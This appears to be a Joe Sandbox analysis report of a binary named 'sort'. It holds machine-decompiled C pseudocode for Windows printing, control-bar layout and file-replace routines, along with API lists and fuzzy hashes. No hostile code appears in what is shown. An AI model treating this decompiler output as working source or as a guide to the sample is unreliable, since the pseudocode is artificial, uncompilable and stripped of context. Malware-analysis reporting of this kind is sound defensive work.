                                            											__eflags = _t296;
                                            											if(_t296 < 0) {
                                            												L50:
                                            												_t452 =  *((intOrPtr*)(_t463 - 0x24));
                                            												 *(_t463 - 0x1c) = 1;
                                            											} else {
                                            												__eflags =  *0x439c48; // 0x1
                                            												_t455 =  *((intOrPtr*)(_t463 - 0x24));
                                            												if(__eflags != 0) {
                                            													 *((intOrPtr*)( *_t455 + 0xdc))(_t463 - 0x34, _t463 - 0x80);
                                            												}
                                            												 *((intOrPtr*)( *_t455 + 0xfc))(_t463 - 0x34, _t463 - 0x80);
                                            												__eflags = EndPage( *(_t463 - 0x30));
                                            												if(__eflags < 0) {
                                            													goto L50;
                                            												} else {
                                            													_t300 = E00427F7F(__eflags,  *(_t463 - 0x30), 0);
                                            													__eflags = _t300;
                                            													if(_t300 == 0) {
                                            														goto L50;
                                            													} else {
                                            														_t452 =  *((intOrPtr*)(_t463 - 0x24));
                                            														 *(_t463 - 0x6c) =  *(_t463 - 0x6c) +  *((intOrPtr*)(_t463 - 0x18));
                                            														__eflags =  *(_t463 - 0x6c) -  *(_t463 - 0x10);
                                            														if( *(_t463 - 0x6c) !=  *(_t463 - 0x10)) {
                                            															continue;
                                            														} else {
                                            														}
                                            													}
                                            												}
                                            											}
                                            											goto L51;
                                            										}
                                            										goto L51;
                                            									}
                                            								} else {
                                            									 *((intOrPtr*)( *_t452 + 0xdc))(_t463 - 0x34, _t463 - 0x80);
                                            									 *((intOrPtr*)( *_t452 + 0xfc))(_t463 - 0x34, _t463 - 0x80);
                                            									L51:
                                            									__eflags =  *(_t463 - 0x7c);
                                            									if( *(_t463 - 0x7c) == 0) {
                                            										__eflags =  *(_t463 - 0x1c);
                                            										if( *(_t463 - 0x1c) != 0) {
                                            											AbortDoc( *(_t463 - 0x30));
                                            										} else {
                                            											L53:
                                            											EndDoc( *(_t463 - 0x30));
                                            										}
                                            									}
                                            								}
                                            								E004166CE(E00404DAE(), 1);
                                            								 *((intOrPtr*)( *_t452 + 0x100))(_t463 - 0x34, _t463 - 0x80);
                                            								E00413F6F(_t463 - 0xf0);
                                            								E00419BEE(_t463 - 0x34);
                                            							} else {
                                            								_t310 = StartDocA( *(_t463 - 0x30), _t463 - 0x94);
                                            								__eflags = _t310 - 0xffffffff;
                                            								if(_t310 != 0xffffffff) {
                                            									goto L27;
                                            								} else {
                                            									E004166CE(E00404DAE(), 1);
                                            									 *((intOrPtr*)( *_t452 + 0x100))(_t463 - 0x34, _t463 - 0x80);
                                            									E00413F6F(_t463 - 0xf0);
                                            									E00419BEE(_t463 - 0x34);
                                            									_push(0xffffffff);
                                            									_push(0);
                                            									_push(0xf106);
                                            									E0041BB7E(_t463 - 0x34, __eflags);
                                            								}
                                            							}
                                            							 *(_t463 - 4) = 0xe;
                                            							E00416AEC(_t463 - 0x20);
                                            							 *(_t463 - 4) = 0xd;
                                            							 *((intOrPtr*)(_t463 - 0xf0)) = 0x42cb34;
                                            							E00411D13(_t463 - 0xf0);
                                            							 *(_t463 - 4) = 0xb;
                                            							E00419C1F(_t463 - 0x34);
                                            							 *(_t463 - 4) = 0xa;
                                            							E00416AEC(_t463 - 0x38);
                                            							 *(_t463 - 4) = 1;
                                            							_t396 = _t463 - 0x14;
                                            						} else {
                                            							__eflags =  *(_t463 - 0x7c);
                                            							if( *(_t463 - 0x7c) != 0) {
                                            								goto L12;
                                            							} else {
                                            								E00416B16(_t463 - 0x1c, _t463, 0xf045);
                                            								 *(_t463 - 4) = 2;
                                            								E00416B16(_t463 - 0x40, _t463, 0xf046);
                                            								 *(_t463 - 4) = 3;
                                            								E00416B16(_t463 - 0x44, _t463, 0xf047);
                                            								 *(_t463 - 4) = 4;
                                            								E00416B16(_t463 - 0x10, _t463, 0xf048);
                                            								_push(0);
                                            								_push( *((intOrPtr*)(_t463 - 0x44)));
                                            								 *(_t463 - 4) = 5;
                                            								_push(6);
                                            								_push( *((intOrPtr*)(_t463 - 0x40)));
                                            								_push( *(_t463 - 0x1c));
                                            								_push(0);
                                            								E00410385(_t463 - 0x338);
                                            								 *(_t463 - 4) = 6;
                                            								 *(_t463 - 0x2ac) =  *(_t463 - 0x10);
                                            								_t335 = E004104E7(0);
                                            								__eflags = _t335 - 1;
                                            								if(_t335 == 1) {
                                            									_push(_t463 - 0x18);
                                            									_t337 = E004105C2(_t463 - 0x338);
                                            									 *(_t463 - 4) = 8;
                                            									E00416B95(_t463 - 0x3c, _t463, _t337);
                                            									 *(_t463 - 4) = 6;
                                            									E00416AEC(_t463 - 0x18);
                                            									 *(_t463 - 4) = 9;
                                            									E00416AEC(_t463 - 0x28c);
                                            									 *(_t463 - 4) = 5;
                                            									E00411D13(_t463 - 0x338);
                                            									 *(_t463 - 4) = 4;
                                            									E00416AEC(_t463 - 0x10);
                                            									 *(_t463 - 4) = 3;
                                            									E00416AEC(_t463 - 0x44);
                                            									 *(_t463 - 4) = 2;
                                            									E00416AEC(_t463 - 0x40);
                                            									 *(_t463 - 4) = 1;
                                            									E00416AEC(_t463 - 0x1c);
                                            									goto L12;
                                            								} else {
                                            									 *(_t463 - 4) = 7;
                                            									E00416AEC(_t463 - 0x28c);
                                            									 *(_t463 - 4) = 5;
                                            									E00411D13(_t463 - 0x338);
                                            									 *(_t463 - 4) = 4;
                                            									E00416AEC(_t463 - 0x10);
                                            									 *(_t463 - 4) = 3;
                                            									E00416AEC(_t463 - 0x44);
                                            									 *(_t463 - 4) = 2;
                                            									E00416AEC(_t463 - 0x40);
                                            									 *(_t463 - 4) = 1;
                                            									_t396 = _t463 - 0x1c;
                                            								}
                                            							}
                                            						}
                                            						E00416AEC(_t396);
                                            						 *(_t463 - 4) = 0;
                                            						E00416AEC(_t463 - 0x3c);
                                            					}
                                            				} else {
                                            					_t353 =  *((intOrPtr*)( *((intOrPtr*)(E00424BFB() + 4)) + 0xac));
                                            					if(_t353 == 0 ||  *((intOrPtr*)(_t353 + 0x10)) != 3) {
                                            						L5:
                                            						 *(_t463 - 0x74) = 1;
                                            						goto L6;
                                            					} else {
                                            						_t355 = CreateDCA( *(_t353 + 0x1c),  *(_t353 + 0x18),  *(_t353 + 0x20), 0);
                                            						_t448 =  *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c));
                                            						 *( *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c)) + 0x10) = _t355;
                                            						_t357 =  *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c));
                                            						_t473 =  *((intOrPtr*)(_t357 + 0x10));
                                            						if( *((intOrPtr*)(_t357 + 0x10)) != 0) {
                                            							goto L5;
                                            						} else {
                                            							_push(0xffffffff);
                                            							_push(0);
                                            							_push(0xf106);
                                            							E0041BB7E(_t448, _t473);
                                            						}
                                            					}
                                            				}
                                            				 *(_t463 - 4) =  *(_t463 - 4) | 0xffffffff;
                                            				_t228 = E004288AC(_t463 - 0x80);
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t463 - 0xc));
                                            				return _t228;
                                            			}







































                                            0x00428646
                                            0x004286a8
                                            0x004286a8
                                            0x004286ab
                                            0x00428648
                                            0x00428648
                                            0x0042864e
                                            0x00428651
                                            0x0042865f
                                            0x0042865f
                                            0x00428671
                                            0x00428680
                                            0x00428682
                                            0x00000000
                                            0x00428684
                                            0x00428688
                                            0x0042868d
                                            0x0042868f
                                            0x00000000
                                            0x00428691
                                            0x00428694
                                            0x00428697
                                            0x0042869d
                                            0x004286a0
                                            0x00000000
                                            0x00000000
                                            0x004286a6
                                            0x004286a0
                                            0x0042868f
                                            0x00428682
                                            0x00000000
                                            0x00428646
                                            0x00000000
                                            0x004285c6
                                            0x0042858b
                                            0x00428597
                                            0x004285a9
                                            0x004286b2
                                            0x004286b2
                                            0x004286b5
                                            0x004286b7
                                            0x004286ba
                                            0x004286ca
                                            0x004286bc
                                            0x004286bc
                                            0x004286bf
                                            0x004286bf
                                            0x004286ba
                                            0x004286b5
                                            0x004286d9
                                            0x004286ea
                                            0x004286f6
                                            0x004286fe
                                            0x004284cb
                                            0x004284d5
                                            0x004284db
                                            0x004284de
                                            0x00000000
                                            0x004284e0
                                            0x004284e9
                                            0x004284fa
                                            0x00428506
                                            0x0042850e
                                            0x00428513
                                            0x00428515
                                            0x00428516
                                            0x0042851b
                                            0x0042851b
                                            0x004284de
                                            0x00428706
                                            0x0042870a
                                            0x00428715
                                            0x00428719
                                            0x00428723
                                            0x0042872b
                                            0x0042872f
                                            0x00428737
                                            0x0042873b
                                            0x00428740
                                            0x00428744
                                            0x004281bf
                                            0x004281bf
                                            0x004281c2
                                            0x00000000
                                            0x004281c8
                                            0x004281d0
                                            0x004281dd
                                            0x004281e1
                                            0x004281ee
                                            0x004281f2
                                            0x004281ff
                                            0x00428203
                                            0x00428208
                                            0x0042820f
                                            0x00428212
                                            0x00428216
                                            0x00428218
                                            0x0042821b
                                            0x0042821e
                                            0x0042821f
                                            0x0042822d
                                            0x00428231
                                            0x00428237
                                            0x0042823c
                                            0x0042823f
                                            0x00428298
                                            0x00428299
                                            0x004282a2
                                            0x004282a6
                                            0x004282ae
                                            0x004282b2
                                            0x004282bd
                                            0x004282c1
                                            0x004282cc
                                            0x004282d0
                                            0x004282d8
                                            0x004282dc
                                            0x004282e4
                                            0x004282e8
                                            0x004282f0
                                            0x004282f4
                                            0x004282fc
                                            0x00428300
                                            0x00000000
                                            0x00428241
                                            0x00428247
                                            0x0042824b
                                            0x00428256
                                            0x0042825a
                                            0x00428262
                                            0x00428266
                                            0x0042826e
                                            0x00428272
                                            0x0042827a
                                            0x0042827e
                                            0x00428283
                                            0x00428287
                                            0x00428287
                                            0x0042823f
                                            0x004281c2
                                            0x00428747
                                            0x0042874f
                                            0x00428752
                                            0x00428752
                                            0x00428135
                                            0x0042813d
                                            0x00428145
                                            0x00428186
                                            0x00428186
                                            0x00000000
                                            0x0042814d
                                            0x0042815a
                                            0x00428163
                                            0x00428166
                                            0x0042816c
                                            0x0042816f
                                            0x00428172
                                            0x00000000
                                            0x00428174
                                            0x00428174
                                            0x00428176
                                            0x00428177
                                            0x0042817c
                                            0x0042817c
                                            0x00428172
                                            0x00428145
                                            0x00428757
                                            0x0042875e
                                            0x00428769
                                            0x00428771

                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00428108
                                              • Part of subcall function 00428824: __EH_prolog.LIBCMT ref: 00428829
                                              • Part of subcall function 00413672: GetMessageTime.USER32(Function_0002440D), ref: 00413684
                                              • Part of subcall function 00413672: GetMessagePos.USER32 ref: 0041368D
                                            • CreateDCA.GDI32(?,?,?,00000000), ref: 0042815A
                                            • SetAbortProc.GDI32(?,Function_00027F7F), ref: 00428421
                                            • UpdateWindow.USER32(?), ref: 004284C0
                                            • StartDocA.GDI32(?,?), ref: 004284D5
                                            • EndDoc.GDI32(?), ref: 004286BF
                                              • Part of subcall function 0041BB7E: __EH_prolog.LIBCMT ref: 0041BB83
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: H_prolog$Message$AbortCreateProcStartTimeUpdateWindow
                                            • String ID:
                                            • API String ID: 900908304-0
                                            • Opcode ID: a9a56cf884ea0ddfdff13adf36a7dc5d90a4e26b108d0df44a24b90832e2b856
                                            • Instruction ID: b1286eb136246b1ee29ef1a1e14188ff5951a4f8bc16bfaf6e35fdac19ebc766
                                            • Opcode Fuzzy Hash: a9a56cf884ea0ddfdff13adf36a7dc5d90a4e26b108d0df44a24b90832e2b856
                                            • Instruction Fuzzy Hash: 1C127070E01219EFCF14EBA4D885AEDBBB4BF14308F5040AEE515B3292DB789A44DF65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E0041D717(void* __ebx, intOrPtr __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                            				signed int _v8;
                                            				intOrPtr _v12;
                                            				signed int _v16;
                                            				struct tagRECT _v32;
                                            				int _v36;
                                            				signed int _v40;
                                            				intOrPtr _v44;
                                            				intOrPtr _v48;
                                            				long _v56;
                                            				signed int _v60;
                                            				void* _v64;
                                            				intOrPtr _v68;
                                            				intOrPtr* _v72;
                                            				struct tagRECT _v88;
                                            				struct tagRECT _v104;
                                            				int _v136;
                                            				char _v144;
                                            				intOrPtr* _t191;
                                            				intOrPtr _t197;
                                            				signed int _t199;
                                            				intOrPtr* _t205;
                                            				intOrPtr _t213;
                                            				signed int _t215;
                                            				long _t218;
                                            				signed int _t219;
                                            				signed int _t225;
                                            				void* _t229;
                                            				intOrPtr* _t231;
                                            				intOrPtr _t238;
                                            				intOrPtr _t239;
                                            				int _t244;
                                            				signed int _t245;
                                            				signed int _t249;
                                            				signed int _t251;
                                            				signed int _t256;
                                            				long _t263;
                                            				intOrPtr _t264;
                                            				int _t269;
                                            				signed int _t273;
                                            				signed int _t277;
                                            				long _t285;
                                            				void* _t293;
                                            				signed int _t294;
                                            				signed int _t295;
                                            				signed int _t299;
                                            				intOrPtr _t305;
                                            				long _t312;
                                            				int _t322;
                                            				long _t327;
                                            				signed int _t333;
                                            				intOrPtr _t336;
                                            				RECT* _t341;
                                            				signed int _t342;
                                            				intOrPtr* _t343;
                                            				int _t345;
                                            
                                            				_t293 = __ebx;
                                            				_t336 = __ecx;
                                            				_v68 = __ecx;
                                            				_t191 = E0041E6BA( &_v64, _a8, _a12);
                                            				_t341 = _t336 + 0x94;
                                            				_v12 =  *_t191;
                                            				_v8 =  *((intOrPtr*)(_t191 + 4));
                                            				if(IsRectEmpty(_t341) != 0) {
                                            					GetClientRect( *(E00414C6C(_t336) + 0x1c),  &_v88);
                                            					_t197 = _v88.right - _v88.left;
                                            					_t305 = _v88.bottom - _v88.top;
                                            				} else {
                                            					_t197 = _t341->right - _t341->left;
                                            					_t305 = _t341->bottom - _t341->top;
                                            				}
                                            				_t342 = 0;
                                            				_v48 = _t197;
                                            				_v44 = _t305;
                                            				if( *((intOrPtr*)(_t336 + 0x90)) == 0) {
                                            					_v136 = BeginDeferWindowPos( *(_t336 + 0x84));
                                            				} else {
                                            					_v136 = 0;
                                            				}
                                            				_t199 =  *0x439bf0; // 0x2
                                            				_push(_t293);
                                            				_t294 =  *0x439bf4; // 0x2
                                            				_v40 = _t342;
                                            				_t295 =  ~_t294;
                                            				_v56 =  ~_t199;
                                            				_v36 = _t342;
                                            				_v16 = _t342;
                                            				if( *(_t336 + 0x84) <= _t342) {
                                            					L73:
                                            					if( *((intOrPtr*)(_t336 + 0x90)) == _t342 && _v136 != _t342) {
                                            						EndDeferWindowPos(_v136);
                                            					}
                                            					SetRectEmpty( &_v104);
                                            					E0041F52D(_t336,  &_v104, _a12);
                                            					if(_a8 == _t342 || _a12 == _t342) {
                                            						if(_v12 != _t342) {
                                            							_v12 = _v12 + _v104.left - _v104.right;
                                            						}
                                            					}
                                            					if(_a8 == _t342 || _a12 != _t342) {
                                            						if(_v8 != _t342) {
                                            							_v8 = _v8 + _v104.top - _v104.bottom;
                                            						}
                                            					}
                                            					_t205 = _a4;
                                            					 *_t205 = _v12;
                                            					 *((intOrPtr*)(_t205 + 4)) = _v8;
                                            					return _t205;
                                            				} else {
                                            					do {
                                            						_t343 = E0041DD28(_t336, _v16);
                                            						_v72 = _t343;
                                            						_t213 =  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x80)) + _v16 * 4));
                                            						if(_t343 == 0) {
                                            							if(_t213 != 0) {
                                            								goto L71;
                                            							}
                                            							L58:
                                            							_t215 = _v40;
                                            							if(_t215 != 0) {
                                            								if(_a12 == 0) {
                                            									_t312 = _v56 + _t215 -  *0x439bf0;
                                            									_v56 = _t312;
                                            									if(_v12 <= _t312) {
                                            										_v12 = _t312;
                                            									}
                                            									if(_v8 <= _t295) {
                                            										_v8 = _t295;
                                            									}
                                            									_t299 =  *0x439bf4; // 0x2
                                            									_t295 =  ~_t299;
                                            								} else {
                                            									_t295 = _t295 + _t215 -  *0x439bf4;
                                            									_t218 = _v56;
                                            									if(_v12 <= _t218) {
                                            										_v12 = _t218;
                                            									}
                                            									if(_v8 <= _t295) {
                                            										_v8 = _t295;
                                            									}
                                            									_t219 =  *0x439bf0; // 0x2
                                            									_v56 =  ~_t219;
                                            								}
                                            								_v40 = _v40 & 0x00000000;
                                            							}
                                            							goto L71;
                                            						}
                                            						if( *((intOrPtr*)( *_t343 + 0xc8))() == 0) {
                                            							L51:
                                            							if(_v36 != 0) {
                                            								goto L71;
                                            							}
                                            							L52:
                                            							 *((intOrPtr*)( *_t343 + 0xcc))( &_v136);
                                            							goto L71;
                                            						}
                                            						_t225 =  *(_t343 + 0x64);
                                            						if((_t225 & 0x00000004) == 0 || (_t225 & 0x00000001) == 0) {
                                            							asm("sbb eax, eax");
                                            							_t229 = ( ~(_t225 & 0x0000a000) & 0x000000fa) + 0x10;
                                            						} else {
                                            							_t229 = 6;
                                            						}
                                            						_t231 =  *((intOrPtr*)( *_t343 + 0xbc))( &_v144, 0xffffffff, _t229);
                                            						_t327 = _v56;
                                            						_v64 =  *_t231;
                                            						_v60 =  *((intOrPtr*)(_t231 + 4));
                                            						_v32.left = _t327;
                                            						_v32.bottom =  *((intOrPtr*)(_t231 + 4)) + _t295;
                                            						_v32.right =  *_t231 + _t327;
                                            						_v32.top = _t295;
                                            						GetWindowRect( *(_t343 + 0x1c),  &_v88);
                                            						E0041A2F1(_t336,  &_v88);
                                            						_t322 = 0;
                                            						if(_a12 == 0) {
                                            							_t238 = _v88.top;
                                            							if(_t238 > _v32.top &&  *((intOrPtr*)(_t336 + 0x78)) == 0) {
                                            								OffsetRect( &_v32, 0, _t238 - _v32.top);
                                            								_t322 = 0;
                                            							}
                                            							_t239 = _v32.bottom;
                                            							if(_t239 > _v44 &&  *((intOrPtr*)(_t336 + 0x78)) == _t322) {
                                            								_t333 = _v44 - _t239 - _v32.top -  *0x439bf4;
                                            								_t256 = _t333;
                                            								if(_t333 <= _t295) {
                                            									_t256 = _t295;
                                            								}
                                            								OffsetRect( &_v32, _t322, _t256 - _v32.top);
                                            								_t322 = 0;
                                            							}
                                            							if(_v36 == _t322) {
                                            								if(_v32.top < _v44 -  *0x439bf4) {
                                            									goto L44;
                                            								}
                                            								_t249 = _v16;
                                            								if(_t249 <= _t322 ||  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x80)) + _t249 * 4 - 4)) == _t322) {
                                            									goto L44;
                                            								} else {
                                            									goto L56;
                                            								}
                                            							} else {
                                            								_t251 =  *0x439bf4; // 0x2
                                            								_v36 = _t322;
                                            								OffsetRect( &_v32, _t322,  ~(_v32.top + _t251));
                                            								L44:
                                            								_t244 = EqualRect( &_v32,  &_v88);
                                            								if(_t244 == 0) {
                                            									if( *((intOrPtr*)(_t336 + 0x90)) == _t244 && ( *(_t343 + 0x64) & 0x00000001) == 0) {
                                            										asm("movsd");
                                            										asm("movsd");
                                            										asm("movsd");
                                            										asm("movsd");
                                            										_t343 = _v72;
                                            										_t336 = _v68;
                                            									}
                                            									E004152C7( &_v136,  *(_t343 + 0x1c),  &_v32);
                                            								}
                                            								_t245 = _v64;
                                            								_t295 = _v32.top -  *0x439bf4 + _v60;
                                            								if(_v40 > _t245) {
                                            									goto L52;
                                            								} else {
                                            									_v40 = _t245;
                                            									goto L51;
                                            								}
                                            							}
                                            						} else {
                                            							_t263 = _v88.left;
                                            							if(_t263 > _v32.left &&  *((intOrPtr*)(_t336 + 0x78)) == 0) {
                                            								OffsetRect( &_v32, _t263 - _v32.left, 0);
                                            								_t322 = 0;
                                            							}
                                            							_t264 = _v32.right;
                                            							if(_t264 <= _v48 ||  *((intOrPtr*)(_t336 + 0x78)) != _t322) {
                                            								L22:
                                            								if(_v36 == _t322) {
                                            									if(_v32.left < _v48 -  *0x439bf0) {
                                            										L27:
                                            										_t269 = EqualRect( &_v32,  &_v88);
                                            										if(_t269 == 0) {
                                            											if( *((intOrPtr*)(_t336 + 0x90)) == _t269 && ( *(_t343 + 0x64) & 0x00000001) == 0) {
                                            												asm("movsd");
                                            												asm("movsd");
                                            												asm("movsd");
                                            												asm("movsd");
                                            												_t343 = _v72;
                                            												_t336 = _v68;
                                            											}
                                            											E004152C7( &_v136,  *(_t343 + 0x1c),  &_v32);
                                            										}
                                            										_v56 = _v64 -  *0x439bf0 + _v32.left;
                                            										_t273 = _v60;
                                            										if(_v40 <= _t273) {
                                            											_v40 = _t273;
                                            										}
                                            										goto L52;
                                            									}
                                            									_t249 = _v16;
                                            									if(_t249 <= _t322 ||  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x80)) + _t249 * 4 - 4)) == _t322) {
                                            										goto L27;
                                            									} else {
                                            										L56:
                                            										_t345 = 1;
                                            										E004115B1(_t336 + 0x7c, _t249, _t322, _t345);
                                            										_v36 = _t345;
                                            										goto L58;
                                            									}
                                            								}
                                            								_t277 =  *0x439bf0; // 0x2
                                            								_v36 = _t322;
                                            								OffsetRect( &_v32,  ~(_t277 + _v32.left), _t322);
                                            								goto L27;
                                            							} else {
                                            								_t285 = _v48 - _t264 -  *0x439bf0 - _v32.left;
                                            								if(_t285 <= _v56) {
                                            									_t285 = _v56;
                                            								}
                                            								OffsetRect( &_v32, _t285 - _v32.left, _t322);
                                            								_t322 = 0;
                                            								goto L22;
                                            							}
                                            						}
                                            						L71:
                                            						_v16 = _v16 + 1;
                                            					} while (_v16 <  *(_t336 + 0x84));
                                            					_t342 = 0;
                                            					goto L73;
                                            				}
                                            			}

                                            APIs
                                            • IsRectEmpty.USER32 ref: 0041D748
                                            • GetClientRect.USER32 ref: 0041D76D
                                            • BeginDeferWindowPos.USER32 ref: 0041D79D
                                            • GetWindowRect.USER32 ref: 0041D862
                                            • OffsetRect.USER32(?,?,00000000), ref: 0041D894
                                            • OffsetRect.USER32(?,?,00000000), ref: 0041D8CA
                                            • OffsetRect.USER32(?,00000002,00000000), ref: 0041D8EC
                                            • EqualRect.USER32 ref: 0041D921
                                            • OffsetRect.USER32(?,00000000,?), ref: 0041D99B
                                            • OffsetRect.USER32(?,00000000,?), ref: 0041D9CF
                                            • OffsetRect.USER32(?,00000000,?), ref: 0041D9F5
                                            • EqualRect.USER32 ref: 0041DA03
                                            • EndDeferWindowPos.USER32(?), ref: 0041DB48
                                            • SetRectEmpty.USER32(?), ref: 0041DB52
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Rect$Offset$Window$DeferEmptyEqual$BeginClient
                                            • String ID:
                                            • API String ID: 3160784657-0
                                            • Opcode ID: 3854477eee98c4e742db328241d5054ba40e360253ad15e6f1d97d6129b3ec7c
                                            • Instruction ID: 4bc4fb7537ac9ebda1473157cc7a63845d4aad135b3ed423640b2285e9e568f1
                                            • Opcode Fuzzy Hash: 3854477eee98c4e742db328241d5054ba40e360253ad15e6f1d97d6129b3ec7c
                                            • Instruction Fuzzy Hash: 19F1F9B1E0021ADFCF14DFA8D984AEEB7B5FF08305F14816AE516E7251D738A981CB58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 78%
                                            			E00418E48(intOrPtr __ecx) {
                                            				void* __edi;
                                            				void* __esi;
                                            				void* _t60;
                                            				CHAR* _t61;
                                            				_Unknown_base(*)()* _t67;
                                            				void* _t70;
                                            				CHAR* _t73;
                                            				short* _t79;
                                            				CHAR* _t82;
                                            				short* _t88;
                                            				CHAR* _t91;
                                            				void* _t112;
                                            				long _t114;
                                            				short* _t116;
                                            				intOrPtr _t118;
                                            				int _t122;
                                            				int _t124;
                                            				int _t126;
                                            				void* _t127;
                                            				void* _t129;
                                            				void* _t130;
                                            				short* _t133;
                                            				intOrPtr _t135;
                                            
                                            				E00406520(E00429FEC, _t127);
                                            				_t130 = _t129 - 0x20;
                                            				_t118 = __ecx;
                                            				_push(_t112);
                                            				 *((intOrPtr*)(_t127 - 0x1c)) = __ecx;
                                            				E00416861(_t127 - 0x18, __ecx + 0xc);
                                            				 *(_t127 - 4) = 0;
                                            				E004179D8(_t118, _t112, _t118);
                                            				if( *((intOrPtr*)( *(_t118 + 0x10) - 8)) != 0) {
                                            					_t61 =  *0x436980; // 0x436994
                                            					_t114 = 0;
                                            					 *(_t127 - 0x14) = _t61;
                                            					_t135 =  *0x439c38; // 0x0
                                            					 *(_t127 - 4) = 1;
                                            					if(_t135 != 0) {
                                            						L15:
                                            						E00417B0B( *(_t127 - 0x18));
                                            						goto L16;
                                            					} else {
                                            						_t67 = GetProcAddress(GetModuleHandleA("KERNEL32"), "ReplaceFile");
                                            						_t136 = _t67;
                                            						 *(_t127 - 0x2c) = _t67;
                                            						if(_t67 == 0) {
                                            							goto L15;
                                            						} else {
                                            							_push(0);
                                            							_push( *(_t118 + 0x10));
                                            							_push(_t127 - 0x28);
                                            							_t70 = E00418BE2(_t136);
                                            							_t133 = _t130 + 0xc;
                                            							 *(_t127 - 4) = 2;
                                            							E00416B95(_t127 - 0x14, _t127, _t70);
                                            							_t111 = _t127 - 0x28;
                                            							 *(_t127 - 4) = 1;
                                            							E00416AEC(_t127 - 0x28);
                                            							_t73 =  *(_t127 - 0x14);
                                            							 *(_t127 - 0x10) = _t73;
                                            							if(_t73 != 0) {
                                            								_t122 = lstrlenA(_t73) + 1;
                                            								__eflags = _t122 + _t122 + 0x00000003 & 0x000000fc;
                                            								E00406830(_t122 + _t122 + 0x00000003 & 0x000000fc, _t111);
                                            								_t79 = _t133;
                                            								 *(_t127 - 0x24) = _t79;
                                            								 *_t79 = 0;
                                            								MultiByteToWideChar(0, 0,  *(_t127 - 0x10), 0xffffffff, _t79, _t122);
                                            								_t118 =  *((intOrPtr*)(_t127 - 0x1c));
                                            								 *(_t127 - 0x20) =  *(_t127 - 0x24);
                                            							} else {
                                            								 *(_t127 - 0x20) = 0;
                                            							}
                                            							_t82 =  *(_t118 + 0x10);
                                            							 *(_t127 - 0x10) = _t82;
                                            							if(_t82 != 0) {
                                            								_t124 = lstrlenA(_t82) + 1;
                                            								__eflags = _t124 + _t124 + 0x00000003 & 0x000000fc;
                                            								E00406830(_t124 + _t124 + 0x00000003 & 0x000000fc, _t111);
                                            								_t88 = _t133;
                                            								 *(_t127 - 0x24) = _t88;
                                            								 *_t88 = 0;
                                            								MultiByteToWideChar(0, 0,  *(_t127 - 0x10), 0xffffffff, _t88, _t124);
                                            								_t118 =  *((intOrPtr*)(_t127 - 0x1c));
                                            							} else {
                                            								 *(_t127 - 0x24) = 0;
                                            							}
                                            							_t91 =  *(_t127 - 0x18);
                                            							 *(_t127 - 0x10) = _t91;
                                            							if(_t91 != 0) {
                                            								_t126 = lstrlenA(_t91) + 1;
                                            								__eflags = _t126 + _t126 + 0x00000003 & 0x000000fc;
                                            								E00406830(_t126 + _t126 + 0x00000003 & 0x000000fc, _t111);
                                            								_t116 = _t133;
                                            								 *_t116 = 0;
                                            								MultiByteToWideChar(0, 0,  *(_t127 - 0x10), 0xffffffff, _t116, _t126);
                                            								_t118 =  *((intOrPtr*)(_t127 - 0x1c));
                                            							} else {
                                            								_t116 = 0;
                                            							}
                                            							_push(0);
                                            							_push(0);
                                            							_push(3);
                                            							_push( *(_t127 - 0x20));
                                            							_push( *(_t127 - 0x24));
                                            							_push(_t116);
                                            							if( *(_t127 - 0x2c)() != 0) {
                                            								E00417B0B( *(_t127 - 0x14));
                                            							} else {
                                            								_t114 = GetLastError();
                                            								if(_t114 == 0x498 || _t114 == 0) {
                                            									goto L15;
                                            								}
                                            								L16:
                                            								if(_t114 == 0x499) {
                                            									E00417B0B( *(_t127 - 0x14));
                                            								}
                                            								E00417AE9( *(_t118 + 0x10),  *(_t127 - 0x18));
                                            							}
                                            						}
                                            					}
                                            					 *(_t127 - 4) = 0;
                                            					E00416AEC(_t127 - 0x14);
                                            				}
                                            				 *(_t127 - 4) =  *(_t127 - 4) | 0xffffffff;
                                            				_t60 = E00416AEC(_t127 - 0x18);
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t127 - 0xc));
                                            				return _t60;
                                            			}
                                            0x00419008
                                            0x0041900f
                                            0x0041901a
                                            0x00419025

                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00418E4D
                                              • Part of subcall function 00416861: InterlockedIncrement.KERNEL32(?), ref: 00416876
                                              • Part of subcall function 004179D8: CloseHandle.KERNEL32(00000001,?,?,0041772F,?,?,004176CD), ref: 004179E7
                                              • Part of subcall function 004179D8: GetLastError.KERNEL32(00000000,0041772F,?,?,004176CD), ref: 00417A0C
                                            • GetModuleHandleA.KERNEL32(KERNEL32,?), ref: 00418EA0
